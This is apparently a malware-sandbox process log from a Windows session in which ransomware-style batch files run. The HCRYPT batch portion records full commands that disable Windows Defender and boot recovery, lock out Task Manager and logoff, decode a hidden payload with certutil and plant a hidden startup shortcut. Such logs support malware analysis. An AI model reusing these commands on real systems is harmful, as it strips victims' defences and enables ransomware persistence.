"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7508,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:1
1⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --field-trial-handle=7704,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:1
1⤵
PID:5540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=6484,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:1
1⤵
PID:5760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=6508,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
1⤵
PID:5840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=7220,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7936 /prefetch:8
1⤵
PID:6044

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --field-trial-handle=7836,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8140 /prefetch:1
1⤵
PID:6052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8384,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8516 /prefetch:8
1⤵
PID:5212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8716,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8728 /prefetch:8
1⤵
PID:4600

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5140

C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\setup.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\setup.exe"
1⤵
PID:5756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=8636,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8580 /prefetch:8
1⤵
PID:3224

C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp1_AESCrypt_v310_x64.zip\AESCrypt_v310_x64\AESCrypt.msi"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5324

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1FD7E1E5820E1DCB16FDB0378C688C4C C
2⤵
- Loads dropped DLL
PID:4948

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
2⤵
PID:4668

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B288974E1180889D9C56BB2F54441B6A
2⤵
- Loads dropped DLL
PID:6044

C:\Windows\System32\MsiExec.exe
"C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\AESCrypt\AESCrypt.dll"
2⤵
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
PID:5560

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:5592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --field-trial-handle=7744,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:1
1⤵
PID:6100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --field-trial-handle=6112,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7988 /prefetch:1
1⤵
PID:1960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --field-trial-handle=8952,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:1
1⤵
PID:4804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8152,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8172 /prefetch:8
1⤵
PID:3212

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9068,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:8
1⤵
PID:888

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=9068,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9028 /prefetch:8
1⤵
PID:2364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --field-trial-handle=9044,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:1
1⤵
PID:3412

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --field-trial-handle=6192,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8708 /prefetch:1
1⤵
PID:3988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --field-trial-handle=6132,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6204 /prefetch:1
1⤵
PID:5700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --field-trial-handle=7264,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:1
1⤵
PID:2948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --field-trial-handle=6256,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8984 /prefetch:1
1⤵
PID:3292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --field-trial-handle=6224,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5532 /prefetch:1
1⤵
PID:4724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --field-trial-handle=5500,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9176 /prefetch:1
1⤵
PID:5336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\system32\dashost.exe
dashost.exe {892eebe8-fbf9-4a59-bfade6e5b8c45671}
2⤵
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Ransomware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3648

C:\Windows\system32\mode.com
mode con:cols=50 lines=2
2⤵
PID:2924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mshta.exe "C:\Users\Admin\Desktop\Ransomware.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2928

C:\Windows\system32\mshta.exe
mshta.exe "C:\Users\Admin\Desktop\Ransomware.bat"
3⤵
- Blocklisted process makes network request
PID:4196

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan - Copy (2).txt
1⤵
PID:5976

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\f94adfb48dd849a5808cc7ae465bcddf /t 5124 /p 4196
1⤵
PID:5228

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Importan - Copy (2).txt
1⤵
PID:1760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --field-trial-handle=5492,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=9160 /prefetch:1
1⤵
PID:5932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --field-trial-handle=5516,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:1
1⤵
PID:208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --field-trial-handle=9168,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:1
1⤵
PID:5848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --field-trial-handle=7912,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:1
1⤵
PID:5876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --field-trial-handle=8700,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:1
1⤵
PID:4392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --field-trial-handle=8080,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5520 /prefetch:1
1⤵
PID:2184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6476,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:8
1⤵
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\batch-somware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\batch-somware.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type
3⤵
PID:4456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\batch-somware.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:5968

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\batch-somware.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c type
3⤵
PID:3152

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\batch-somware.bat
1⤵
PID:5228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --field-trial-handle=8296,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8992 /prefetch:1
1⤵
PID:216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --field-trial-handle=9164,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6196 /prefetch:1
1⤵
PID:3056

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6140,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7936 /prefetch:8
1⤵
PID:5360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5124

C:\Windows\system32\chcp.com
chcp 65001
2⤵
PID:1676

C:\Windows\system32\fsutil.exe
fsutil dirty query C:
2⤵
PID:5588

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\vbscript.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat" "
3⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:6124

C:\Windows\system32\chcp.com
chcp 65001
4⤵
PID:3916

C:\Windows\system32\fsutil.exe
fsutil dirty query C:
4⤵
PID:4460

C:\Windows\system32\msg.exe
msg * ⚠️ File failed to run correctly (Process aborted)
4⤵
PID:4552

C:\Windows\system32\cmd.exe
cmd /c exit 115
4⤵
PID:4520

C:\Windows\system32\attrib.exe
Attrib +h +s +r "C:\Users\Admin\Desktop\HCRYPT_v1.2.0_stable.bat"
4⤵
PID:6100

C:\Windows\system32\bcdedit.exe
bcdedit /set recoveryenabled No
4⤵
- Modifies boot configuration data using bcdedit
PID:3888

C:\Windows\system32\bcdedit.exe
bcdedit /set bootstatuspolicy ignoreallfailures
4⤵
- Modifies boot configuration data using bcdedit
PID:3260

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
4⤵
PID:2284

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
4⤵
PID:3472

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
4⤵
PID:2080

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
4⤵
PID:1856

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
4⤵
PID:4744

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
4⤵
PID:3076

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.Update" /v "Enabled" /t REG_DWORD /d 0 /f
4⤵
PID:3584

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
4⤵
PID:2396

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:5220

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:2444

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:1444

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:1448

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:888

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3452

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2028

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1612

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:3872

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:5040

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4932

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:5432

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
4⤵
PID:3152

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:3444

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1480

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4812

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:3204

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:4364

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:2076

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:1896

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
4⤵
PID:3864

C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
4⤵
PID:4240

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
4⤵
PID:892

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3628

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:5392

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2124

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4192

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5872

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2260

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5696

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5612

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5388

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\Sense" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:864

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:5556

C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
4⤵
PID:1472

C:\Windows\system32\taskkill.exe
taskkill /f /IM chrome.exe
4⤵
- Kills process with taskkill
PID:5232

C:\Windows\system32\taskkill.exe
taskkill /F /IM taskmgr.exe
4⤵
- Kills process with taskkill
PID:4536

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:2496

C:\Windows\system32\certutil.exe
certutil -decode cmd.txt "C:\Users\Admin/3D Objects/65657421881128013.cmd"
4⤵
PID:5692

C:\Windows\system32\timeout.exe
timeout 2 /nobreak
4⤵
PID:5932

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin/3D Objects/65657421881128013.cmd"
4⤵
PID:6052

C:\Windows\system32\cscript.exe
cscript CS2.vbs
4⤵
- Drops startup file
PID:3832

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk"
4⤵
- Drops startup file
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c 2>NUL ping -4 -n 1 GYLQWJCN | findstr [
4⤵
PID:4924

C:\Windows\system32\PING.EXE
ping -4 -n 1 GYLQWJCN
5⤵
- Runs ping.exe
PID:2240

